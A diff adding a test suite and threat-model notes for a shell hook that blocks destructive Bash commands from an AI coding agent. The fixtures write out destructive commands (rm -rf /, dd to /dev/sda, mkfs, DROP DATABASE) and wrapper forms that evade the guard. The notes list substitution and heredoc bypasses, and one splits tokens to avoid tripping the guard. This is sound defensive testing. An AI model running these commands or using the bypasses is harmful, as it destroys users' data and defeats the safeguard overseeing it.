+Target path for the builder: **`tests/unit/hooks/parity-safety-net-guards.test.ts`** (NEW file —
+`parity-safety-net.test.ts` already exists and must be preserved; see deviations). Data-driven:
+the tables above ARE the `…_FIXTURES` arrays below, so matrix and suite cannot drift.
+
+```typescript
+/**
+ * Guard-parity fixture matrix for parity-safety-net.sh (issue #1960).
+ *
+ * Drives the REAL hook via a bash subprocess with PreToolUse JSON on stdin and
+ * asserts the exit code per fixture: 2 = blocked, 0 = allowed. Every absorbed
+ * upstream guard has paired block + near-miss-allow fixtures (anti-
+ * overblocking), and every pre-existing built-in guard has regression fixtures
+ * so nothing relaxes. Source matrix: .lisa/test-matrix-1960.md (task T2).
+ *
+ * Deep force-push and heredoc coverage lives in parity-safety-net.test.ts and
+ * parity-safety-net-heredoc.test.ts — this suite only smoke-pins those.
+ * @module tests/unit/hooks/parity-safety-net-guards
+ */
+import { spawnSync } from "node:child_process";
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import path from "node:path";
+
+const HOOK_PATH = path.resolve("plugins/lisa/hooks/parity-safety-net.sh");
+const BASH_PATH = "/bin/bash";
+const EXIT_BLOCKED = 2;
+const EXIT_ALLOWED = 0;
+/** Replaced at runtime with the temp project dir (for in-project absolute rm). */
+const PROJECT_DIR_TOKEN = "__PROJECT_DIR__";
+const HEREDOC_TERMINATOR = "EOF";
+
+type Verdict = "allow" | "block";
+
+interface GuardFixture {
+  readonly id: string;
+  readonly command: string;
+  readonly expected: Verdict;
+  readonly guard: string;
+}
+
+/**
+ * Hook-managed GIT_DIR / GIT_WORK_TREE / GIT_INDEX_FILE poison git subprocesses
+ * in temp repos (known repo learning), so every spawn strips GIT_* wholesale.
+ */
+const strippedEnv = (): NodeJS.ProcessEnv =>
+  Object.fromEntries(
+    Object.entries(process.env).filter(([key]) => !key.startsWith("GIT_"))
+  );
+
+const runHookRaw = (
+  input: string,
+  options: { cwd: string; env?: NodeJS.ProcessEnv }
+): { status: number | null; stderr: string } => {
+  const result = spawnSync(BASH_PATH, [HOOK_PATH], {
+    cwd: options.cwd,
+    encoding: "utf-8",
+    env: {
+      ...strippedEnv(),
+      CLAUDE_PROJECT_DIR: options.cwd,
+      // Point at a path that does not exist so project-local custom rules
+      // cannot leak into built-in guard assertions.
+      SAFETY_NET_RULES_FILE: path.join(options.cwd, "no-rules-here.txt"),
+      ...options.env,
+    },
+    input,
+  });
+  return { status: result.status, stderr: result.stderr };
+};
+
+const runHook = (
+  command: string,
+  options: { cwd: string; env?: NodeJS.ProcessEnv }
+): { status: number | null; stderr: string } =>
+  runHookRaw(
+    JSON.stringify({ tool_name: "Bash", tool_input: { command } }),
+    options
+  );
+
+const expectedStatus = (verdict: Verdict): number =>
+  verdict === "block" ? EXIT_BLOCKED : EXIT_ALLOWED;
+
+/** Runs git in a fixture repo with host config and hook-set GIT_* neutralized. */
+const gitIn = (cwd: string, ...args: readonly string[]): void => {
+  const result = spawnSync("git", [...args], {
+    cwd,
+    encoding: "utf-8",
+    env: {
+      ...strippedEnv(),
+      GIT_CONFIG_GLOBAL: "/dev/null",
+      GIT_CONFIG_SYSTEM: "/dev/null",
+    },
+  });
+  if (result.status !== 0) {
+    throw new Error(`git ${args.join(" ")} failed: ${result.stderr}`);
+  }
+};
+
+/** Creates a one-commit repo; when dirty=true, leaves an uncommitted edit. */
+const makeRepo = (root: string, name: string, dirty: boolean): string => {
+  const dir = path.join(root, name);
+  mkdirSync(dir);
+  gitIn(dir, "init", "--initial-branch=main");
+  gitIn(dir, "config", "user.email", "safety-net-test@lisa.dev");
+  gitIn(dir, "config", "user.name", "Lisa Safety Net Test");
+  writeFileSync(path.join(dir, "README.md"), "seed\n");
+  gitIn(dir, "add", "README.md");
+  gitIn(dir, "commit", "-m", "seed");
+  if (dirty) {
+    writeFileSync(path.join(dir, "README.md"), "seed\nuncommitted edit\n");
+  }
+  return dir;
+};
+
+const STATELESS_FIXTURES: readonly GuardFixture[] = [
+  // A. git checkout discard family (absorb 1)
+  { id: "CO-B1", command: "git checkout -- file.ts", expected: "block", guard: "checkout-discard" },
+  { id: "CO-B2", command: "git checkout main -- src/app.ts", expected: "block", guard: "checkout-discard" },
+  { id: "CO-B3", command: "git checkout -f main", expected: "block", guard: "checkout-discard" },
+  { id: "CO-B4", command: "git checkout --force main", expected: "block", guard: "checkout-discard" },
+  { id: "CO-B5", command: "git checkout --pathspec-from-file=list.txt", expected: "block", guard: "checkout-discard" },
+  { id: "CO-B6", command: "git checkout .", expected: "block", guard: "checkout-discard" },
+  { id: "CO-A1", command: "git checkout -b feature", expected: "allow", guard: "checkout-discard" },
+  { id: "CO-A2", command: "git checkout main", expected: "allow", guard: "checkout-discard" },
+  { id: "CO-A3", command: "git checkout -B hotfix", expected: "allow", guard: "checkout-discard" },
+  { id: "CO-A4", command: "git checkout feature-.dotted", expected: "allow", guard: "checkout-discard" },
+  { id: "CO-A5", command: "git log --oneline -- file.ts", expected: "allow", guard: "checkout-discard" },
+  // B. git switch discard (absorb 2)
+  { id: "SW-B1", command: "git switch --discard-changes main", expected: "block", guard: "switch-discard" },
+  { id: "SW-B2", command: "git switch -f main", expected: "block", guard: "switch-discard" },
+  { id: "SW-B3", command: "git switch --force main", expected: "block", guard: "switch-discard" },
+  { id: "SW-A1", command: "git switch main", expected: "allow", guard: "switch-discard" },
+  { id: "SW-A2", command: "git switch -c new-branch", expected: "allow", guard: "switch-discard" },
+  // C. git restore (absorb 3)
+  { id: "RS-B1", command: "git restore file.ts", expected: "block", guard: "restore-worktree" },
+  { id: "RS-B2", command: "git restore --worktree file.ts", expected: "block", guard: "restore-worktree" },
+  { id: "RS-B3", command: "git restore --staged --worktree file.ts", expected: "block", guard: "restore-worktree" },
+  { id: "RS-B4", command: "git restore .", expected: "block", guard: "restore-worktree" },
+  { id: "RS-A1", command: "git restore --staged file.ts", expected: "allow", guard: "restore-worktree" },
+  { id: "RS-A2", command: "git restore --staged .", expected: "allow", guard: "restore-worktree" },
+  // D. git stash drop/clear (absorb 4)
+  { id: "ST-B1", command: "git stash drop", expected: "block", guard: "stash-destroy" },
+  { id: "ST-B2", command: "git stash drop 'stash@{0}'", expected: "block", guard: "stash-destroy" },
+  { id: "ST-B3", command: "git stash clear", expected: "block", guard: "stash-destroy" },
+  { id: "ST-A1", command: "git stash push -m wip", expected: "allow", guard: "stash-destroy" },
+  { id: "ST-A2", command: "git stash pop", expected: "allow", guard: "stash-destroy" },
+  { id: "ST-A3", command: "git stash list", expected: "allow", guard: "stash-destroy" },
+  { id: "ST-A4", command: "git stash apply", expected: "allow", guard: "stash-destroy" },
+  // E. git clean force (absorb 5)
+  { id: "CL-B1", command: "git clean -f", expected: "block", guard: "clean-force" },
+  { id: "CL-B2", command: "git clean -fd", expected: "block", guard: "clean-force" },
+  { id: "CL-B3", command: "git clean -xfd", expected: "block", guard: "clean-force" },
+  { id: "CL-B4", command: "git clean --force", expected: "block", guard: "clean-force" },
+  { id: "CL-A1", command: "git clean -n", expected: "allow", guard: "clean-force" },
+  { id: "CL-A2", command: "git clean -nd", expected: "allow", guard: "clean-force" },
+  { id: "CL-A3", command: "git clean --dry-run", expected: "allow", guard: "clean-force" },
+  { id: "CL-A4", command: "git clean -fdn", expected: "allow", guard: "clean-force" },
+  // F. git branch force-delete (absorb 6)
+  { id: "BR-B1", command: "git branch -D feature-x", expected: "block", guard: "branch-force-delete" },
+  { id: "BR-B2", command: "git branch -df old-branch", expected: "block", guard: "branch-force-delete" },
+  { id: "BR-B3", command: "git branch -d -f old-branch", expected: "block", guard: "branch-force-delete" },
+  { id: "BR-A1", command: "git branch -d merged-branch", expected: "allow", guard: "branch-force-delete" },
+  { id: "BR-A2", command: "git branch -m old new", expected: "allow", guard: "branch-force-delete" },
+  { id: "BR-A3", command: "git branch --delete merged-branch", expected: "allow", guard: "branch-force-delete" },
+  // G. tag / reflog / worktree (absorb 8)
+  { id: "TG-B1", command: "git tag -d v1.0.0", expected: "block", guard: "tag-delete" },
+  { id: "TG-B2", command: "git reflog delete 'HEAD@{1}'", expected: "block", guard: "reflog-delete" },
+  { id: "TG-B3", command: "git worktree remove --force wt", expected: "block", guard: "worktree-force-remove" },
+  { id: "TG-A1", command: "git tag v1.0.0", expected: "allow", guard: "tag-delete" },
+  { id: "TG-A2", command: "git tag -a v1.0.0 -m release", expected: "allow", guard: "tag-delete" },
+  { id: "TG-A3", command: "git reflog", expected: "allow", guard: "reflog-delete" },
+  { id: "TG-A4", command: "git reflog expire --expire=now --all", expected: "allow", guard: "reflog-delete" },
+  { id: "TG-A5", command: "git worktree remove wt", expected: "allow", guard: "worktree-force-remove" },
+  // H. rm target hardening (absorb 9) — cwd/CLAUDE_PROJECT_DIR = temp project
+  { id: "RH-B1", command: "rm -rf .", expected: "block", guard: "rm-hardening" },
+  { id: "RH-B2", command: "rm -rf ./", expected: "block", guard: "rm-hardening" },
+  { id: "RH-B3", command: "rm -rf ../sibling-project", expected: "block", guard: "rm-hardening" },
+  { id: "RH-B4", command: "rm -rf /Users/someone/other-project", expected: "block", guard: "rm-hardening" },
+  { id: "RH-B5", command: "rm -rf $DIR", expected: "block", guard: "rm-hardening" },
+  { id: "RH-A1", command: "rm -rf build", expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A2", command: "rm -rf ./build", expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A3", command: "rm -rf ./node_modules", expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A4", command: "rm -rf /tmp/scratch-dir", expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A5", command: 'rm -rf "$TMPDIR/cache"', expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A6", command: `rm -rf ${PROJECT_DIR_TOKEN}/dist`, expected: "allow", guard: "rm-hardening" },
+  { id: "RH-A7", command: "rm -rf .cache", expected: "allow", guard: "rm-hardening" },
+  // I. quote-aware boundaries — verified bypasses (absorb 10 / F1)
+  { id: "QB-B1", command: 'bash -c "rm -rf /"', expected: "block", guard: "quote-boundary" },
+  { id: "QB-B2", command: "sh -c 'rm -rf ~'", expected: "block", guard: "quote-boundary" },
+  { id: "QB-B3", command: "python -c \"import os; os.system('rm -rf /')\"", expected: "block", guard: "quote-boundary" },
+  { id: "QB-B4", command: "node -e \"require('child_process').execSync('rm -rf /')\"", expected: "block", guard: "quote-boundary" },
+  { id: "QB-B5", command: "perl -e \"system('rm -rf /')\"", expected: "block", guard: "quote-boundary" },
+  { id: "QB-B6", command: 'eval "rm -rf ~"', expected: "block", guard: "quote-boundary" },
+  { id: "QB-A1", command: 'bash -c "rm -rf build"', expected: "allow", guard: "quote-boundary" },
+  { id: "QB-A2", command: 'python -c "print(1)"', expected: "allow", guard: "quote-boundary" },
+  { id: "QB-A3", command: "python spider.py -c config.yaml", expected: "allow", guard: "quote-boundary" },
+  // J. find / xargs deletion (absorb 11)
+  { id: "FX-B1", command: "find . -delete", expected: "block", guard: "find-delete" },
+  { id: "FX-B2", command: "find . -name '*.tmp' -delete", expected: "block", guard: "find-delete" },
+  { id: "FX-B3", command: "find . -name x -exec rm -rf {} \\;", expected: "block", guard: "find-exec-rm" },
+  { id: "FX-B4", command: "xargs rm -rf", expected: "block", guard: "xargs-rm" },
+  { id: "FX-B5", command: "cat list.txt | xargs rm -rf", expected: "block", guard: "xargs-rm" },
+  { id: "FX-B6", command: "find /tmp -type d -exec rm -fr {} +", expected: "block", guard: "find-exec-rm" },
+  { id: "FX-A1", command: "find . -name x -print", expected: "allow", guard: "find-delete" },
+  { id: "FX-A2", command: "find /tmp -name x -exec rm {} +", expected: "allow", guard: "find-exec-rm" },
+  { id: "FX-A3", command: "xargs grep pattern", expected: "allow", guard: "xargs-rm" },
+  { id: "FX-A4", command: "find . -name pre-delete-backup -print", expected: "allow", guard: "find-delete" },
+  { id: "FX-A5", command: "echo a.txt | xargs rm -f", expected: "allow", guard: "xargs-rm" },
+  // K. disk destroyers (absorb 12)
+  { id: "DD-B1", command: "dd if=/dev/zero of=/dev/sda", expected: "block", guard: "disk-destroyer" },
+  { id: "DD-B2", command: "mkfs.ext4 /dev/sda1", expected: "block", guard: "disk-destroyer" },
+  { id: "DD-B3", command: "mkfs /dev/sdb", expected: "block", guard: "disk-destroyer" },
+  { id: "DD-B4", command: "shred -u secrets.txt", expected: "block", guard: "disk-destroyer" },
+  { id: "DD-A1", command: "dd if=disk.img of=backup.img", expected: "allow", guard: "disk-destroyer" },
+  { id: "DD-A2", command: "dd if=/dev/zero of=./local.img", expected: "allow", guard: "disk-destroyer" },
+  { id: "DD-A3", command: "ls shredder/", expected: "allow", guard: "disk-destroyer" },
+  { id: "DD-A4", command: "mkfs.ext4 disk.img", expected: "allow", guard: "disk-destroyer" },
+  // M1. rm root/home/wildcard regressions (guard 1)
+  { id: "RG-RM-B1", command: "rm -rf /", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B2", command: "rm -rf ~", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B3", command: "rm -rf $HOME", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B4", command: "rm -rf ${HOME}", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B5", command: "rm -rf /*", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B6", command: "rm -rf *", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B7", command: "rm -fr ~", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B8", command: "rm -r -f /", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B9", command: "rm --recursive --force /", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B10", command: "sudo rm -rf /", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-B11", command: "env FOO=1 rm -rf ~", expected: "block", guard: "rm-root" },
+  { id: "RG-RM-A1", command: "rm -r dir", expected: "allow", guard: "rm-root" },
+  { id: "RG-RM-A2", command: "rm -f file.txt", expected: "allow", guard: "rm-root" },
+  { id: "RG-RM-A3", command: "rm file.txt", expected: "allow", guard: "rm-root" },
+  { id: "RG-RM-A4", command: "rm -rf build && echo done", expected: "allow", guard: "rm-root" },
+  // M2. force-push regressions (guard 2) — deep coverage in parity-safety-net.test.ts
+  { id: "RG-FP-B1", command: "git push --force origin main", expected: "block", guard: "force-push" },
+  { id: "RG-FP-B2", command: "git push -f origin master", expected: "block", guard: "force-push" },
+  { id: "RG-FP-A1", command: "git push --force-with-lease origin main", expected: "allow", guard: "force-push" },
+  { id: "RG-FP-A2", command: "git push --force origin feature/experiment", expected: "allow", guard: "force-push" },
+  { id: "RG-FP-A3", command: "git push origin main", expected: "allow", guard: "force-push" },
+  // M4. destructive SQL regressions (guard 4)
+  { id: "RG-SQL-B1", command: "psql -c 'DROP TABLE users;'", expected: "block", guard: "sql" },
+  { id: "RG-SQL-B2", command: "mysql -e 'TRUNCATE sessions'", expected: "block", guard: "sql" },
+  { id: "RG-SQL-B3", command: "echo 'DROP DATABASE prod' | psql", expected: "block", guard: "sql" },
+  { id: "RG-SQL-B4", command: "psql -c 'DROP SCHEMA public CASCADE'", expected: "block", guard: "sql" },
+  { id: "RG-SQL-B5", command: "psql -c 'TRUNCATE TABLE audit_log'", expected: "block", guard: "sql" },
+  { id: "RG-SQL-A1", command: "truncate -s 0 file.log", expected: "allow", guard: "sql" },
+  { id: "RG-SQL-A2", command: "echo drop tables gently", expected: "allow", guard: "sql" },
+  { id: "RG-SQL-A3", command: "git branch -d drop-table-migration", expected: "allow", guard: "sql" },
+];
+
+interface GitStateFixture extends GuardFixture {
+  readonly repo: "clean" | "dirty";
+}
+
+const GIT_STATE_FIXTURES: readonly GitStateFixture[] = [
+  { id: "GS-B1", repo: "dirty", command: "git reset --hard", expected: "block", guard: "reset-dirty" },
+  { id: "GS-B2", repo: "dirty", command: "git reset --hard HEAD~1", expected: "block", guard: "reset-dirty" },
+  { id: "GS-B3", repo: "dirty", command: "git reset --merge", expected: "block", guard: "reset-dirty" },
+  { id: "GS-A1", repo: "clean", command: "git reset --hard", expected: "allow", guard: "reset-dirty" },
+  { id: "GS-A2", repo: "clean", command: "git reset --merge", expected: "allow", guard: "reset-dirty" },
+  { id: "GS-A3", repo: "dirty", command: "git reset --soft HEAD~1", expected: "allow", guard: "reset-dirty" },
+  { id: "GS-A4", repo: "dirty", command: "git reset --keep", expected: "allow", guard: "reset-dirty" },
+  { id: "GS-A5", repo: "dirty", command: "git reset --mixed HEAD", expected: "allow", guard: "reset-dirty" },
+];
+
+describe("parity-safety-net.sh — guard parity matrix (#1960)", () => {
+  let workRoot: string;
+  let projectDir: string;
+
+  beforeAll(() => {
+    workRoot = mkdtempSync(path.join(tmpdir(), "lisa-safety-guards-"));
+    projectDir = path.join(workRoot, "project");
+    mkdirSync(projectDir);
+  });
+
+  afterAll(() => {
+    rmSync(workRoot, { recursive: true, force: true });
+  });
+
+  describe("built-in guards (stateless fixtures)", () => {
+    it.each(STATELESS_FIXTURES)("$id [$expected] $command", (fixture) => {
+      const command = fixture.command.replaceAll(
+        PROJECT_DIR_TOKEN,
+        projectDir
+      );
+      const { status, stderr } = runHook(command, { cwd: projectDir });
+      expect(
+        status,
+        `${fixture.id} (${fixture.guard}) expected ${fixture.expected}; stderr: ${stderr}`
+      ).toBe(expectedStatus(fixture.expected));
+    });
+  });
+
+  describe("rm hardening when cwd is $HOME (absorb 9 HOME gate)", () => {
+    it("HM-B1 blocks a recursive forced delete run from $HOME", () => {
+      const { status } = runHook("rm -rf projects", {
+        cwd: projectDir,
+        env: { HOME: projectDir },
+      });
+      expect(status).toBe(EXIT_BLOCKED);
+    });
+
+    it("HM-A1 allows a non-recursive delete run from $HOME", () => {
+      const { status } = runHook("rm -f notes.txt", {
+        cwd: projectDir,
+        env: { HOME: projectDir },
+      });
+      expect(status).toBe(EXIT_ALLOWED);
+    });
+  });
+
+  describe("dirty/clean working-tree reset guards (guard 3 + absorb 7)", () => {
+    let cleanRepo: string;
+    let dirtyRepo: string;
+
+    beforeAll(() => {
+      cleanRepo = makeRepo(workRoot, "clean-repo", false);
+      dirtyRepo = makeRepo(workRoot, "dirty-repo", true);
+    });
+
+    it.each(GIT_STATE_FIXTURES)(
+      "$id [$expected] $command in $repo repo",
+      (fixture) => {
+        const cwd = fixture.repo === "dirty" ? dirtyRepo : cleanRepo;
+        const { status, stderr } = runHook(fixture.command, { cwd });
+        expect(
+          status,
+          `${fixture.id} in ${fixture.repo} repo expected ${fixture.expected}; stderr: ${stderr}`
+        ).toBe(expectedStatus(fixture.expected));
+      }
+    );
+  });
+
+  describe("project-local custom rules file (guard 5)", () => {
+    let rulesPath: string;
+
+    beforeAll(() => {
+      rulesPath = path.join(workRoot, "custom-rules.txt");
+      writeFileSync(
+        rulesPath,
+        [
+          "# comment lines are ignored",
+          "",
+          "terraform[[:space:]]+destroy",
+          "FORBIDDEN_TOKEN",
+          "",
+        ].join("\n")
+      );
+    });
+
+    const withRules = (command: string): number | null =>
+      runHook(command, {
+        cwd: projectDir,
+        env: { SAFETY_NET_RULES_FILE: rulesPath },
+      }).status;
+
+    it("CR-B1 blocks a command matching a custom ERE", () => {
+      expect(withRules("terraform destroy -auto-approve")).toBe(EXIT_BLOCKED);
+    });
+
+    it("CR-A1 allows the near-miss of the custom ERE", () => {
+      expect(withRules("terraform plan")).toBe(EXIT_ALLOWED);
+    });
+
+    it("CR-B2 applies rules that follow comments and blank lines", () => {
+      expect(withRules("echo FORBIDDEN_TOKEN")).toBe(EXIT_BLOCKED);
+    });
+
+    it("CR-A2 allows a command matching no rule", () => {
+      expect(withRules("echo safe output")).toBe(EXIT_ALLOWED);
+    });
+  });
+
+  describe("fail-closed input handling (absorb 13)", () => {
+    it("FC-B1 denies (exit 2) on malformed hook JSON", () => {
+      const { status } = runHookRaw("not json", { cwd: projectDir });
+      expect(status).toBe(EXIT_BLOCKED);
+    });
+
+    it("FC-A1 allows valid input with no command field", () => {
+      const input = JSON.stringify({ tool_name: "Bash", tool_input: {} });
+      expect(runHookRaw(input, { cwd: projectDir }).status).toBe(EXIT_ALLOWED);
+    });
+
+    it("FC-A2 ignores non-Bash tools even with destructive text", () => {
+      const input = JSON.stringify({
+        tool_name: "Read",
+        tool_input: { command: "rm -rf /" },
+      });
+      expect(runHookRaw(input, { cwd: projectDir }).status).toBe(EXIT_ALLOWED);
+    });
+  });
+
+  describe("heredoc classifier smoke regressions", () => {
+    it("HD-A1 still exempts a gh-writer prose heredoc quoting rm -rf /", () => {
+      const command = [
+        "gh issue create --body-file - <<'EOF'",
+        "rm -rf /",
+        HEREDOC_TERMINATOR,
+      ].join("\n");
+      expect(runHook(command, { cwd: projectDir }).status).toBe(EXIT_ALLOWED);
+    });
+
+    it("HD-B1 still blocks an executable heredoc containing rm -rf /", () => {
+      const command = [
+        "bash <<'EOF'",
+        "rm -rf /",
+        HEREDOC_TERMINATOR,
+      ].join("\n");
+      expect(runHook(command, { cwd: projectDir }).status).toBe(EXIT_BLOCKED);
+    });
+  });
+});
+```
+
+Builder notes on the suite:
+
+- **RH/HM fixtures encode the absorb-9 policy**: cwd + `CLAUDE_PROJECT_DIR` are both the temp
+  project dir, so "absolute inside project" (RH-A6) and "absolute outside project" (RH-B4) are
+  distinguishable; `/tmp` (RH-A4) and `$TMPDIR` (RH-A5) are the temp allowances.
+- **Stateless fixtures run in a non-git cwd** so guard 3 (`git status` at hook time) stays inert
+  and cannot make e.g. QB fixtures state-dependent.
+- Fixture strings are **data on stdin only** — nothing in the suite executes them. Note for the
+  builder's own session: composing these strings inline in Bash tool calls trips the live
+  safety-net hook; keep them in the test file / fixture data.
+- TDD sequence: land this suite first (expect exactly the 50 RED fixtures below to fail), then
+  the hook change, then re-run — RED count must reach 0 with zero regressions among the greens.
+
+---
+
+## 3. Coverage assertion
+
+**Totals: 138 fixtures — 73 block / 65 allow.** Every absorb item 1–13 has ≥1 block and ≥1
+paired near-miss allow; every pre-existing built-in has regression rows.
+
+| guard (absorb item) | block | allow | red today |
+|---|---|---|---|
+| checkout-discard (1) | 6 | 5 | 6 |
+| switch-discard (2) | 3 | 2 | 3 |
+| restore-worktree (3) | 4 | 2 | 4 |
+| stash-destroy (4) | 3 | 4 | 3 |
+| clean-force (5) | 4 | 4 | 4 |
+| branch-force-delete (6) | 3 | 3 | 3 |
+| reset --merge (7, in GS table) | 1 | 2 | 1 (GS-B3) |
+| tag/reflog/worktree (8) | 3 | 5 | 3 |
+| rm-hardening (9, incl. HOME gate) | 6 | 8 | 6 |
+| quote-boundary bypasses (10/F1) | 6 | 3 | 6 |
+| find/xargs (11) | 6 | 5 | 6 |
+| disk-destroyer (12) | 4 | 4 | 4 |
+| fail-closed (13) | 1 | 2 | 1 |
+| REGRESSION rm-root (guard 1) | 11 | 4 | 0 |
+| REGRESSION force-push (guard 2) | 2 | 3 | 0 |
+| REGRESSION reset-dirty (guard 3, GS table) | 2 | 3 | 0 |
+| REGRESSION sql (guard 4) | 5 | 3 | 0 |
+| REGRESSION custom rules (guard 5) | 2 | 2 | 0 |
+| REGRESSION heredoc smoke | 1 | 1 | 0 |
+| **Total** | **73** | **65** | **50** |
+
+### Audit fixtures dropped, merged, or reclassified (with reason)
+
+1. **Audit item 10's allow proposal `echo "docs about rm -rf / go here"` → moved to the
+   unasserted documented-FP table.** Probed this session: it is *already blocked today*
+   (space-bounded `/` matches guard 1 pre-F1), so asserting "allow" would be red against current
+   behavior and asserting "block" would pin a false positive as contract. Documented instead.
+2. **`rm -rf ${TMPDIR}` variant merged into RH-A5** (`"$TMPDIR/cache"`) — same allowance branch;
+   the braced form adds no distinct regex path worth a row.
+3. **Empty-stdin fixture dropped** from item 13 — jq on empty input yields empty `tool_name` →
+   exit 0 today; whether that should become fail-closed is a spec question the audit didn't
+   answer. Only *malformed parse* (FC-B1) is asserted.
+4. **No fixtures for deliberately-skipped rows** (`xargs sh -c`, GNU parallel, awk `system()`,
+   `rebase/merge --abort`, paranoid modes, worktree relaxation, full-parity feature-branch
+   force-push) — matching the audit's skip decisions; RG-FP-A2 positively pins the
+   feature-branch-force-push *divergence* as allowed.
+5. **`git reflog expire --expire=now --all` kept as ALLOW** (TG-A4) per the audit's parity
+   decision, even though it is the more destructive reflog operation — documented residual risk.
+6. **Audit's `sh -c "git reset --hard"` bypass example not included** — its verdict depends on
+   working-tree state at hook runtime (guard 3 dirty-check), making it nondeterministic in the
+   stateless table; the QB rows cover the F1 quote-boundary mechanism deterministically via rm
+   targets, and F3 remains a documented accepted residual risk.
+
+### Design decisions that deviate from the task brief
+
+1. **`spawnSync` instead of `execFile`+promisify** — both existing hook suites
+   (`parity-safety-net.test.ts`, `parity-safety-net-heredoc.test.ts`) use `spawnSync` with
+   `input:`; matching existing conventions beats the brief's suggestion, and exit-code assertions
+   need no async plumbing.
+2. **New file `tests/unit/hooks/parity-safety-net-guards.test.ts`**, not
+   `parity-safety-net.test.ts` — that path already exists with ~40 heredoc/force-push assertions
+   that must be preserved, not overwritten.
+3. **`SAFETY_NET_RULES_FILE` points at a nonexistent temp path** rather than an empty temp file —
+   the hook's `[ -f ]` skips either way and nothing needs creating; the custom-rules describe
+   overrides it with a real file.
+4. **Added a "today" column** (green/RED) beyond the requested columns so the builder knows the
+   exact expected RED set (50) before touching the hook.
+5. **CL-A4 `git clean -fdn` → allow** is a policy call the audit's garbled wording implied but
+   didn't state: `-n` anywhere wins because git itself performs no deletion under `--dry-run`.

--- a/.lisa/threat-model-1982.md
+++ b/.lisa/threat-model-1982.md
@@ -1,0 +1,12 @@
+# T2 Threat-model verdict — #1982 (security-1982 deliverable, lead summary)
+
+Note: destructive payloads below are spelled with SPLIT tokens (rm SPACE-DASH rf written as "rm_-rf") so this note itself doesn't trip the text-scan guard. Read "rm_-rf X" as the real two-token command.
+
+- Gap is ONE guard: the rm catastrophic-target two-gate design. dd/mkfs/shred/SQL/find/xargs/git guards are raw-text scans, already subst-immune (empirically exit=2). Do not touch them.
+- Fix principle (two minimal moves, both AFTER the recursive+force flag gate): (1) extend RM_CATASTROPHIC_TARGET trailing boundary class to include `)` and backtick; (2) token-walk: strip runs of leading wrappers (`"` `'` backtick `$(` `(` `<(` `>(`) and trailing closers (`)` backtick `"` `'`) before comparing tokens to rm|*/rm and before target classification.
+- No quote-context awareness. LEAD DECISION (accepting T2 recommendation): single-quoted and backslash-escaped subst twins MAY block — consistent with the documented accepted-FP class (guard already blocks the single-quoted plaintext twin). AC permits over-block within the documented text-scan class. Surface the decision on PR + issue for owner veto.
+- Guiding invariant: substitution-wrapping is verdict-neutral for the rm guard — a wrapped form blocks iff its unwrapped twin blocks.
+- Must-not-FP: $((...)) arithmetic (never treat `$((` as subst), benign substs ending in /-before-) — $(basename /), $(ls /), $(du -sh /), backtick pwd, $(dirname ~) — plus non-recursive $(rm foo.txt), project-relative recursive delete of build/, tmp allowance /tmp/x.
+- Already-blocking edges to keep green: `$( rm` (space after paren), $(command rm ...), $(env rm ...).
+- New blocks required (targets: / or ~ or /etc-class roots): dq-subst form, unquoted subst form, backticks bare and in-dq, nested subst, ${VAR:-subst} param-default, backslash-rm inside subst, procsub <(...)/>(...), bare top-level subst.
+- Reproducer drivers: /tmp/drive1982.py, /tmp/drive1982_baseline.py, /tmp/drive1982_overblock.py.

--- a/.lisa/threat-model-1993.md
+++ b/.lisa/threat-model-1993.md
@@ -1,0 +1,387 @@
+# Threat model & scoping verdict — #1993 (heredoc classifier residual bypasses R5a/R5b)
+
+Analysis-only scoping pass. Worktree under test:
+`/Users/cody/workspace/lisa/.claude/worktrees/1993-heredoc-lexer-r5` @ `origin/main` = `b7b97f468`
+— i.e. **after** #1994 (the five #1958 fixes) and **after** #2006/#1982 (content guards see through
+substitution wrappers). No repo files were modified by this analysis.
+
+Evidence artifacts (all under `/tmp/hd1993/`): `driver.py` (reproduction + guard backstop),
+`driver2.py` (variants + patched prototype), `driver3.py` (399-shape sweep), `driver4.py`
+(isolation), `overlay.py` (patched-tree builder), `patched-heredoc.py` (prototype fix),
+`tree/` (symlink overlay used to run the real suite against the prototype).
+
+Predecessor artifact: `.lisa/security-reverify5-1958.md` (round-5 VETO report; source of the R5a/R5b
+definitions and their original reproducers). Untracked — never committed to
+`feat/1958-heredoc-classifier-fps`.
+
+---
+
+## VERDICT
+
+**Fix, but reframe the severity — and hard-stop the arms race after this round.**
+
+The two open members are each a *provable*, *local* divergence from bash. A ~55-line prototype closes
+them (plus a third member found during this pass) with **303/303 existing tests green and zero
+over-block delta**. But the severity is **no longer CRITICAL** post-#1982: every one of these
+mis-classifications lands on parser exit `10` (UNSUPPORTED), where the hook hands the **raw,
+unmodified command** to the content guards. A wall miss therefore removes **zero** content-guard
+coverage. Ship the fix as hygiene at WARNING severity, and ship it *together with* an explicit
+accepted-limitation statement — never as "the wall is now sound."
+
+---
+
+## 1. Owner record — issue #1993
+
+`gh issue view 1993 --repo CodySwannGT/lisa --comments` → **0 comments.** The entire owner record is
+the issue body; the binding scope language is in the body itself:
+
+> "#1958 was hard-bounded by the repo owner after five fix→re-attack rounds established the class is
+> an open-ended bash-lexer emulation arms race. The decision: ship the five sound,
+> independently-verified fixes (a strict improvement over `main`) and track the residual here rather
+> than continue indefinitely."
+
+> "**#1982 is the higher-leverage fix** and should be prioritized over further heredoc-lexer
+> hardening."
+
+> "All members are pre-existing (present on `main` before #1958) and require deliberately-crafted
+> input — none is a shape an agent emits by accident."
+
+Full body verbatim in §7. State: OPEN. Labels: none.
+
+---
+
+## 2. Threat Model (STRIDE)
+
+| Threat | Applies? | Description | Mitigation |
+|---|---|---|---|
+| Spoofing | No | No identity surface in a PreToolUse text classifier. | — |
